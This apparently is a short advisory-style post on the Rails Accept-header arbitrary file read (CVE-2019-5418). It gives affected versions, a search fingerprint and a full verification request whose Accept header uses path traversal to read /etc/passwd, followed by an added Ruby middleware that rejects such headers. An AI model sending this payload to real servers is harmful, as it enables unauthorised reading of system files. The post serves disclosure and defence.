Rails Accept Arbitrary File Reading Vulnerability (CVE-2019-5418)
Vulnerability Description
Ruby on Rails is a relatively new web application framework built on the Ruby language.
Vulnerability Impact
Rails <= 5.2.2.1
Network surveying and mapping
title="Ruby On Rails"
Vulnerability reproduction
Main page
Verification request:
GET /robots HTTP/1.1
Host: 127.0.0.1:3000
Accept-Encoding: gzip, deflate
Accept: ../../../../../../../../etc/passwd%7B%7B
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
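The request above puts a file path where a media type belongs. As an added example (not part of the original post and not the Rails project's own fix), a Rack-style middleware can refuse any Accept header that is not a list of media ranges and log the attempt. The class name AcceptHeaderGuard and its constants are hypothetical, and the sample headers are constructed.

```ruby
# Added example (not Rails code): Rack-style middleware that only lets
# well-formed media ranges through in the Accept header.
class AcceptHeaderGuard
  # RFC 6838 restricted-name: starts with a letter or digit, so "..", "/",
  # "%" and "{" can never appear where a type or subtype is expected.
  NAME  = /[A-Za-z0-9][A-Za-z0-9!$&^_.+\#-]{0,126}/
  PARAM = /;\s*[A-Za-z0-9_.-]+=(?:[A-Za-z0-9_.-]+|"[^"]*")\s*/
  MEDIA_RANGE = /\A(?:\*\/\*|#{NAME}\/(?:\*|#{NAME}))\s*(?:#{PARAM})*\z/

  def self.valid_accept?(value)
    return true if value.nil? # header absent: nothing to check
    value.split(",").map(&:strip).reject(&:empty?)
         .all? { |part| MEDIA_RANGE.match?(part) }
  end

  def initialize(app)
    @app = app
  end

  def call(env)
    accept = env["HTTP_ACCEPT"]
    return @app.call(env) if self.class.valid_accept?(accept)

    # Log a bounded, escaped copy so the attempt is visible to detection.
    env["rack.errors"]&.puts("rejected Accept header: #{accept.inspect[0, 200]}")
    [406, { "Content-Type" => "text/plain" }, ["Not Acceptable\n"]]
  end
end

# Constructed sample requests: a browser-style header and the header from
# the verification request above.
if __FILE__ == $PROGRAM_NAME
  app = AcceptHeaderGuard.new(->(_env) { [200, {}, ["ok"]] })
  ["text/html,application/xml;q=0.9,*/*;q=0.8",
   "../../../../../../../../etc/passwd%7B%7B"].each do |header|
    status, = app.call({ "HTTP_ACCEPT" => header })
    puts "#{status} #{header}"
  end
end
```

In a Rails application a class like this would be inserted early in the middleware stack so the header is checked before it reaches view rendering.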
This post is licensed under CC BY 4.0 by the author.